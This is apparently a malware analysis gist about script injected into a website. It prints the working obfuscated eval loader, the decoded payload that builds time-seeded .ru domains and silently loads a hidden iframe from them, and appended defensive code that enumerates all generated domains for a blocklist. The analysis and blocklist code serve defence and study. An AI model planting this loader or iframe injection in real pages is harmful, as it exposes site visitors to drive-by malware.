@julescarbon
Created May 9, 2014 16:22
jograham.com mal
try {
prototype % 2;
} catch (asd) {
x = 2;
}
try {
q = document[(x) ? "c" + "r" :
2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" +
((f) ? "e" + "n" + "t" : "")]("p");
q.appendChild(q + "");
} catch (fwbewe) {
i = 0;
try {
prototype * 5;
} catch (z) {
fr = "fromChar";
f = [510, 702, 550, 594, 580, 630, 555, 660, 160,
660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50,
192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505,
606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570,
192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 222, 160, 696, 520,
630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 696, 505, 690, 580, 192, 305,
192, 580, 624, 525, 690, 230, 390, 160, 252, 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230,
492, 160, 252, 160, 624, 525, 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160,
372, 160, 288, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575,
606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750, 160, 606, 540,
690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505,
606, 500, 192, 305, 192, 580, 606, 575, 696, 160, 258, 160, 696, 520, 630, 575, 276, 385, 354, 50,
192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 200, 696, 520,
630, 575, 276, 575, 606, 505, 600, 160, 252, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590,
606, 570, 462, 205, 354, 50, 750, 50, 60, 510, 702, 550, 594, 580, 630, 555, 660, 160, 492, 485, 660,
500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702,
550, 630, 600, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 500, 192, 305, 192, 550, 606,
595, 192, 340, 582, 580, 606, 200, 702, 550, 630, 600, 252, 245, 288, 240, 288, 205, 354, 50, 192,
160, 192, 160, 708, 485, 684, 160, 690, 160, 366, 160, 600, 230, 618, 505, 696, 360, 666, 585, 684,
575, 240, 205, 192, 310, 192, 245, 300, 160, 378, 160, 294, 160, 348, 160, 288, 295, 60, 160, 192,
160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 250, 306, 260, 318, 270, 330,
280, 342, 240, 294, 160, 258, 160, 240, 500, 276, 515, 606, 580, 462, 555, 660, 580, 624, 200, 246,
160, 252, 160, 288, 600, 420, 350, 420, 350, 420, 350, 246, 160, 258, 160, 240, 500, 276, 515, 606,
580, 408, 485, 696, 505, 240, 205, 192, 210, 192, 240, 720, 350, 420, 350, 420, 205, 258, 160, 240,
385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 690, 160, 252, 160, 288, 600, 420, 350, 420,
205, 246, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 390, 160, 366, 160, 312, 280, 300,
275, 294, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 462, 160, 366, 160, 300, 245, 312,
275, 312, 280, 306, 270, 312, 275, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 405, 192,
305, 192, 580, 624, 525, 690, 230, 462, 160, 282, 160, 696, 520, 630, 575, 276, 325, 354, 50, 192,
160, 192, 160, 696, 520, 630, 575, 276, 410, 192, 305, 192, 580, 624, 525, 690, 230, 462, 160, 222,
160, 696, 520, 630, 575, 276, 325, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 555, 660,
505, 474, 590, 606, 570, 462, 160, 366, 160, 294, 230, 288, 160, 282, 160, 696, 520, 630, 575, 276,
385, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 550, 606, 600, 696, 160, 366, 160, 660,
505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 354, 50, 192, 160, 192,
160, 684, 505, 696, 585, 684, 550, 192, 580, 624, 525, 690, 295, 60, 625, 60, 50, 612, 585, 660,
495, 696, 525, 666, 550, 192, 495, 684, 505, 582, 580, 606, 410, 582, 550, 600, 555, 654, 390, 702,
545, 588, 505, 684, 200, 684, 220, 192, 385, 630, 550, 264, 160, 462, 485, 720, 205, 738, 50, 192, 160,
192, 160, 684, 505, 696, 585, 684, 550, 192, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200,
240, 385, 582, 600, 270, 385, 630, 550, 246, 160, 252, 160, 684, 230, 660, 505, 720, 580, 240, 205,
192, 215, 192, 385, 630, 550, 246, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192,
515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654,
415, 696, 570, 630, 550, 618, 200, 702, 550, 630, 600, 264, 160, 648, 505, 660, 515, 696, 520, 264,
160, 732, 555, 660, 505, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 570, 582, 550, 600,
160, 366, 160, 660, 505, 714, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426,
505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 295, 60, 160, 192, 160, 192,
590, 582, 570, 192, 540, 606, 580, 696, 505, 684, 575, 192, 305, 192, 455, 234, 485, 234, 220, 234,
490, 234, 220, 234, 495, 234, 220, 234, 500, 234, 220, 234, 505, 234, 220, 234, 510, 234, 220, 234,
515, 234, 220, 234, 520, 234, 220, 234, 525, 234, 220, 234, 530, 234, 220, 234, 535, 234, 220, 234,
540, 234, 220, 234, 545, 234, 220, 234, 550, 234, 220, 234, 555, 234, 220, 234, 560, 234, 220, 234,
565, 234, 220, 234, 570, 234, 220, 234, 575, 234, 220, 234, 580, 234, 220, 234, 585, 234, 220, 234,
590, 234, 220, 234, 595, 234, 220, 234, 600, 234, 220, 234, 605, 234, 220, 234, 610, 234, 465, 354,
50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 580, 684, 160, 366, 160, 234, 195, 354, 50, 192,
160, 192, 160, 612, 555, 684, 200, 708, 485, 684, 160, 630, 160, 366, 160, 288, 295, 192, 525, 192,
300, 192, 540, 606, 550, 618, 580, 624, 295, 192, 525, 192, 215, 258, 160, 246, 615, 60, 160, 192,
160, 192, 160, 192, 160, 192, 575, 696, 570, 192, 215, 366, 160, 648, 505, 696, 580, 606, 570, 690,
455, 594, 570, 606, 485, 696, 505, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240,
570, 582, 550, 600, 220, 192, 240, 264, 160, 648, 505, 696, 580, 606, 570, 690, 230, 648, 505, 660,
515, 696, 520, 192, 225, 192, 245, 246, 465, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192,
160, 684, 505, 696, 585, 684, 550, 192, 575, 696, 570, 192, 215, 192, 195, 276, 195, 192, 215, 192,
610, 666, 550, 606, 295, 60, 625, 60, 50, 690, 505, 696, 420, 630, 545, 606, 555, 702, 580, 240, 510,
702, 550, 594, 580, 630, 555, 660, 200, 246, 615, 60, 160, 192, 160, 192, 580, 684, 605, 738, 50,
192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 240, 580, 726, 560, 606, 555, 612, 160, 630, 510,
684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500, 192, 305, 366, 160, 204, 585,
660, 500, 606, 510, 630, 550, 606, 500, 204, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160,
192, 160, 192, 160, 630, 510, 684, 485, 654, 505, 522, 485, 690, 335, 684, 505, 582, 580, 606, 500,
192, 305, 192, 580, 684, 585, 606, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160,
192, 590, 582, 570, 192, 585, 660, 525, 720, 160, 366, 160, 462, 485, 696, 520, 276, 570, 666, 585,
660, 500, 240, 215, 660, 505, 714, 160, 408, 485, 696, 505, 240, 205, 282, 245, 288, 240, 288, 205,
354, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 708, 485, 684, 160, 600, 555,
654, 485, 630, 550, 468, 485, 654, 505, 192, 305, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400,
690, 505, 702, 500, 666, 410, 582, 550, 600, 555, 654, 415, 696, 570, 630, 550, 618, 200, 702, 550,
630, 600, 264, 160, 294, 270, 264, 160, 234, 570, 702, 195, 246, 295, 60, 160, 192, 160, 192, 160,
192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 160, 366, 160, 600, 555, 594, 585, 654, 505,
660, 580, 276, 495, 684, 505, 582, 580, 606, 345, 648, 505, 654, 505, 660, 580, 240, 170, 438, 350,
492, 325, 462, 345, 204, 205, 354, 160, 60, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160,
192, 525, 612, 570, 654, 230, 690, 505, 696, 325, 696, 580, 684, 525, 588, 585, 696, 505, 240, 170,
690, 570, 594, 170, 264, 160, 204, 520, 696, 580, 672, 290, 282, 235, 204, 215, 600, 555, 654, 485,
630, 550, 468, 485, 654, 505, 258, 170, 282, 570, 702, 550, 612, 555, 684, 505, 690, 580, 684, 585,
660, 315, 690, 525, 600, 305, 588, 555, 696, 550, 606, 580, 300, 170, 246, 295, 192, 50, 192, 160,
192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 630, 510, 684, 545, 276, 575, 696, 605, 648, 505,
276, 595, 630, 500, 696, 520, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160,
192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230,
624, 505, 630, 515, 624, 580, 192, 305, 192, 170, 288, 560, 720, 170, 354, 160, 60, 160, 192, 160,
192, 160, 192, 160, 192, 160, 192, 160, 192, 525, 612, 570, 654, 230, 690, 580, 726, 540, 606, 230,
708, 525, 690, 525, 588, 525, 648, 525, 696, 605, 192, 305, 192, 170, 624, 525, 600, 500, 606, 550,
204, 295, 192, 50, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585,
654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540,
600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160,
192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240,
288, 205, 354
];
v = "eva";
}
if (v) e = window[v + "l"];
w = f;
s = [];
r = String;
z = ((e) ? "Code" : "");
for (; 1776 - 5 + 5 > i; i += 1) {
j = i;
if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
}
if (f) e(s);
}
@julescarbon
Author

// Static decoder for the f[] array above: the divisor alternates 5, 6, 5, 6 ...
// (the loader computes it as 5 + eval("j%2")); s ends up holding the payload shown below.
var s = "";
for (var i = 0; i < 1776; i++) {
    s = s + String.fromCharCode(f[i] / (5 + (i % 2)));
}

@julescarbon
Author

function nextRandomNumber(){
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if(test > 0){
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix){
    var d = new Date(unix*1000);
    var s = d.getHours() > 12 ? 1 : 0;
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max){
    return Math.round((Max-Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone){
    var rand = new RandomNumberGenerator(unix);
    var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
    var str = '';
    for(var i = 0; i < length; i ++ ){
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setTimeout(function(){
    try{
        if(typeof iframeWasCreated == "undefined"){
            iframeWasCreated = true;
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            ifrm = document.createElement("IFRAME"); 
            ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2"); 
            ifrm.style.width = "0px"; 
            ifrm.style.height = "0px"; 
            ifrm.style.visibility = "hidden"; 
            document.body.appendChild(ifrm);
        }
    }catch(e){}
}, 500);

@julescarbon
Author

This malware, found on jograham.com, detangles an encrypted JavaScript string and evaluates it. The resulting program "randomly" generates a Russian domain name which ostensibly loads malware into a hidden iframe. The RNG has been modified so it uses the same seed for each 12-hour period (i.e. the getHours < 12 ? 0 : 1 line which creates the seed). Thus the random domain name changes every 12 hours. You can see this behavior by loading just the RNG functions and running the following snippet:

for (var i = 0; i < 72; i++) {
  var unix = Math.round(+new Date()/1000) + 3600*i;
  var domainName = generatePseudoRandomString(unix, 16, 'ru');
  console.log(domainName)
}

Emits:

qhcplcuugevvyham.ru
tmrtbcienxrbnsjc.ru
dueebwwdllfburag.ru
fzsirujgdbvabrjm.ru
pghnrmkoeoetfwsm.ru
rlvqmipovrqbmvqd.ru
ctjbmgjudwisgshv.ru

However, none of these domains are listed in WHOIS. Since the RNG exhausts 60 domains a month, it's likely that the mal was never intended to function for very long. Based on crawls on archive.org, it appears the mal was injected in the second half of 2012. This implies that some ~1500 potential domains have been generated by the mal since the original injection two years ago.

A cursory googling of the magic numbers employed indicates that the RNG is a textbook Linear Congruential Engine. The webpage gecode.com notes: "While this pseudo-random number generator is not a good source of randomness, it is still an acceptable choice for many applications. The choice of values is taken from D. E. Knuth, The Art of Computer Programming, Vol 2, Seminumerical Algorithms, 3rd edition."
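An added example, not code from the gist or its author, that turns the recovered generator into a precomputed blocklist and a lookup for DNS logs. The seed recovered above is 2345678901 + month*0xFFFFFF + dayOfMonth*0xFFFF + afternoon*0xFFF, where the three fields come from the victim's local clock via getMonth(), getDate() and getHours() > 12. The year never enters the seed, so the domain set repeats every calendar year and has at most 366 x 2 = 732 members, and the "afternoon" half begins at 13:00 local time rather than noon. The code below takes those calendar fields directly instead of a Unix timestamp, so it does not depend on the analyst's timezone. One reproduction caveat: Q = M / A is a floating-point division in the original (not the floored quotient of Schrage's method), so this is not integer Park-Miller; a port to another language has to reproduce IEEE double arithmetic and JavaScript's Math.round (half rounds up, unlike Python's round()) exactly or the domains will not match. The sample query names are constructed.

```javascript
// Added example (not part of the gist): precompute the DGA's entire domain space
// and check hostnames against it without going through Date/local time.
//
// The recovered seed uses month (0-11), day-of-month (1-31) and an afternoon flag
// (local hour > 12); the year is never used, so 366 days x 2 = 732 seeds cover
// every domain the malware can ever generate.

const A = 48271;
const M = 2147483647;
const Q = M / A;            // floating-point, exactly as in the recovered code
const R = M % A;            // 3399
const ONE_OVER_M = 1.0 / M;
const LETTERS = "abcdefghijklmnopqrstuvwxyz";

// Same arithmetic as the recovered nextRandomNumber(). Q is not floored, so this is
// not integer Park-Miller; keep the double-precision operations in this exact order
// or the output stops matching the malware.
function makeGenerator(seed) {
  return function next() {
    const hi = seed / Q;
    const lo = seed % Q;
    const test = A * lo - R * hi;
    seed = test > 0 ? test : test + M;
    return seed * ONE_OVER_M;
  };
}

// Seed formula recovered from the payload, with the Date() lookups replaced by
// explicit calendar fields so the result does not depend on the analyst's timezone.
function seedFor(month, dayOfMonth, afternoon) {
  return 2345678901 + month * 0xFFFFFF + dayOfMonth * 0xFFFF + (afternoon ? 0xFFF : 0);
}

function domainFor(month, dayOfMonth, afternoon, zone = "ru", length = 16) {
  const next = makeGenerator(seedFor(month, dayOfMonth, afternoon));
  let name = "";
  for (let i = 0; i < length; i++) {
    name += LETTERS[Math.round((LETTERS.length - 1) * next())];
  }
  return name + "." + zone;
}

// Every (month, day, half-day) slot the malware can produce. A leap year is used so
// that 29 February is included; the year itself does not enter the seed.
function enumerateSlots() {
  const slots = [];
  for (let month = 0; month < 12; month++) {
    const daysInMonth = new Date(Date.UTC(2012, month + 1, 0)).getUTCDate();
    for (let day = 1; day <= daysInMonth; day++) {
      slots.push({ month, dayOfMonth: day, afternoon: false });
      slots.push({ month, dayOfMonth: day, afternoon: true });
    }
  }
  return slots;
}

// Map domain -> slot: usable as a blocklist, or to attribute a sighting in DNS logs
// back to the victim's local calendar date and half-day.
function buildDomainTable(zone = "ru") {
  const table = new Map();
  for (const slot of enumerateSlots()) {
    table.set(domainFor(slot.month, slot.dayOfMonth, slot.afternoon, zone), slot);
  }
  return table;
}

function lookupDomain(host, table) {
  return table.get(host.toLowerCase().replace(/\.$/, "")) || null;
}

// Constructed sample of DNS query names (not real log data): two are produced by the
// DGA itself, the rest are benign.
const SAMPLE_QUERIES = [
  "www.example.com",
  domainFor(4, 9, false),        // 9 May, morning slot
  "example.net.",
  domainFor(11, 31, true),       // 31 December, afternoon slot
];

function flagDgaQueries(queries, table) {
  return queries
    .map((host) => ({ host, slot: lookupDomain(host, table) }))
    .filter((hit) => hit.slot !== null);
}

const TABLE = buildDomainTable();
console.log(`${TABLE.size} distinct domains in the full space`);
console.log(flagDgaQueries(SAMPLE_QUERIES, TABLE));
```

The slot returned by lookupDomain() is the victim's local date and half-day at the time the iframe was injected, which is useful for timelining; the domains listed above from the author's run can be fed through it the same way. Because the whole space fits in a few hundred entries, a static blocklist (or a sinkhole registration of the 732 names) covers the malware indefinitely.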
